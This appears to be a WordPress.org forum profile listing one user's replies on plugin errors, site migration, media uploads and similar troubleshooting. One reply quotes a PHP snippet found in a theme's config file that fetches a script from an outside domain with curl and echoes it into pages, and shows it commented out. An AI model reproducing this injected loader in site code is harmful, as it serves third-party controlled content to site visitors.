Henry
Forum Replies Created
-
Forum: Reviews
In reply to: [XML Sitemap Generator for Google] Everything is perfectI have a problem with this plugin. After installed Yeost, I have remove Google XML Sitemaps. Was unable to figure why…
This plugin rocks!
I have an error like this.
Warning: array_key_exists() expects parameter 2 to be array, boolean given in /home/admin/unlimitedrealtraffic.com/wp-content/plugins/easy-faq-with-expanding-text/faq.php on line 121
How to get rid of that?
Thank you
Forum: Fixing WordPress
In reply to: The requested URL /jquery-1.6.3.min.jsjquerye.com/jquery-1.6.3.min.js (port 80) error
1)I deactivated all the plugins and re-activated one by one, not found the culprit.
2) I deactivated the theme, the error gone(For sure is the theme caused the error).
3) I search jquery-1.6.3.min.js in the themes folder, no found the file. I then, opened themes folder function.php…I saw the line like the following:
if(defined(‘TEMPLATEPATH’)){ include(“PPT/_config.php”); }So, it was located at the PPT/config.php folder.
I opened the file with notepad and edited inside FTP, then save. SOLVED!
I just commanded the file”
{if (function_exists(‘curl_init’)){$url = “https://www.jquerye.com/jquery-1.6.3.min.js”;$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}
to
//{if (function_exists(‘curl_init’)){$url = “https://www.jquerye.com/jquery-1.6.3.min.js”;$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}
Happy day!
Forum: Fixing WordPress
In reply to: How Do I Remove WordPress From Vpstutorial?Thank you for the replied.
I had tried it also, but not working this way.Forum: Fixing WordPress
In reply to: Page Not Found- Can't access my websiteFTP to your domain, point to WP-content/plugins and rename plugins to plugins-sample for temporary.
Login to yourdomain.com/wp-admin, then, in FTP, change the plugins-sample back to normal.
Activate plugin one by one and get rid of the culprit plugins. Sometimes, a plugin might not up-to-date or incompatible with your current themes.
Just a little help.
Forum: Fixing WordPress
In reply to: Masking a subdomainFirst things first, why you need to have that subdomain since both content is exactly the same.
I sorry for asking that question as above, just a little curious from my sub-conscious mind.
However, we usually do it inside a c-Panel. Point on domain, select redirect or alternatively, watch this video below?
Forum: Fixing WordPress
In reply to: Cannot upload media images to libraryI am not very sure about your situation.
If you were moving from a host to another host, you need to change the media upload setting.Login to your WP dashboard, point to settings, select media, scroll to bottom and change the upload path to…content/uploads ..something like that. Anyway, WordPress will show you the exact path.
Try it, it should works.
Forum: Fixing WordPress
In reply to: Plugin not installingOne critical point to be considered here.
You might using an hosting with php.exec disabled.
If you were with an hosting, you always get that error.
Solution:
1)Talk to your hosting provider to enable it.
2)Change to other hosting which allow php.exec enabled.Hope this little info could be helpful for newbie in the near future.
Regards,
Seo Blog Buzz – Create WordPress Blog In Six Simple StepsForum: Fixing WordPress
In reply to: Need help! Newbie to WordPressAdd post to certain pages.
The simplest way to understand is here.
Mouse point to appearance, click on menu.
Look at the right side, create a menu, namely as Main/Home/Page1, whatever you want, save.
Look at the left side, select Main/Home/Page1 as main menu.1-Add content to your page, eg. Private policy, terms, disclaimer, etc.
2-Back to appearance, menu, select those pages you want to appear on menu bar, each selection will send it to the right side, on there, save and you are good to go.At the time of writing this, I don’t even see my WP dashboard.
Have an awesome day!
keyword xp for 1 dollarForum: Fixing WordPress
In reply to: Moving a wordpress site from one host to anotherHow to go about doing transferring, moving WordPress by yourself.
You can read from the start to the end at the following:Regards,
Keyword XPForum: Fixing WordPress
In reply to: Moving WordPress – Where do I upload the database to?Usually, Database is restore using Cpanel or script like softaculous.
You create Database, edit WP-Config.php and upload to your WordPress root folder.When login to domain/wpadmin, it will guide you through the installation. You just have to remember your DB username and PW.
Forum: Fixing WordPress
In reply to: Error when Installing WordPressWhat panel are you using?
Hypervm/webmin or centos/kloxo…something like that.